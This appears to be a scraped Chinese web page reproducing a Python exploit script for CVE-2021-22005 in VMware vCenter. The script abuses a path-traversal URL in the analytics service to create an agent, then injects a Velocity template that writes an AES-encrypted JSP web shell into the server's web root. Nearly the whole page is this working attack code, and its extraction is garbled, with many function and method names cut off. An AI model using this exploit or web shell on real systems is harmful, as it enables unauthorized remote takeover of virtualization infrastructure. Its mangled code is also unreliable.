CVE-2021-22005:VMwarevCenterGetShell

2024年2月3日发(作者：)

import requestsimport randomimport stringimport sysimport timeimport requestsimport urllib3import e_warnings(reRequestWarning)

def id_generator(size=6, chars=_lowercase + ): return ''.join((chars) for _ in range(size))

def escape(_str): _str = _e("&", "&") _str = _e("<", "<") _str = _e(">", ">") _str = _e(""", """) return _str

def str_to_escaped_unicode(arg_str): escaped_str = '' for s in arg_str: val = ord(s) esc_uni = "u{:04x}".format(val) escaped_str += esc_uni return escaped_str

def createAgent(target, agent_name, log_param):

url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name,log_param) headers = { "Cache-Control": "max-age=0",

"Upgrade-Insecure-Requests": "1",

"User-Agent": "Mozilla/5.0",

"X-Deployment-Secret": "abc",

"Content-Type": "application/json",

"Connection": "close" }

json_data = { "manifestSpec":{},

"objectType": "a2", "collectionTriggerDataNeeded": True, "deploymentDataNeeded":True,

"resultNeeded": True,

"signalCollectionCompleted":True,

"localManifestPath": "a7", "localPayloadPath": "a8", "localObfuscationMapPath": "a9" }

(url, headers=headers, json=json_data, verify=False)

def generate_manifest(webshell_location, webshell):

manifestData = """ ServiceInstance ceUuid n vir:VCenter ServiceInstance

#set($appender = $ender("LOGFILE"))## #set($orig_log = $e())## #set($logger = $)##

$e("%s")##

$teOptions()##

$("%s")##

$e($orig_log)##

$teOptions()##]]>

vir:VCenter """ % (webshell_location, webshell)

return manifestData

def arg(): parser = ntParser() _argument("-t", "--target", help = "Target", required = True) args = _args() target = print("[*] Target: %s" % target) return target

def exec(): target = arg() # Variables webshell_param = id_generator(6) log_param = id_generator(6) agent_name = id_generator(6) shell_name = "" webshell = """<%@page import=".*,.*,.*"%><%!class U extendsClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return Class(b,0,);}}%><%if(hod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/ue("u",k);Cipher c=tance("AES");(2,newSecretKeySpec(es(),"AES"));new U(ss().getClassLoader()).g(l(64Decoder().decodeBuffer(der().readLine()))).newInstance().equals(pageContext);}%>"""

webshell_location = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % shell_name webshell = str_to_escaped_unicode(webshell) manifestData = generate_manifest(webshell_location,webshell) print("[*] Creating Agent") createAgent(target, agent_name, log_param) url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (target,agent_name, log_param) headers = {"Cache-Control": "max-age=0",

"Upgrade-Insecure-Requests": "1",

"User-Agent": "Mozilla/5.0",

"X-Deployment-Secret": "abc",

"Content-Type": "application/json",

"Connection": "close"} json_data ={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"} (url, headers=headers, json=json_data, verify=False) #webshell连接地址 url = "%s/idm/..;/%s" % (target, shell_name) code = (url=url, headers=headers,verify=False).status_code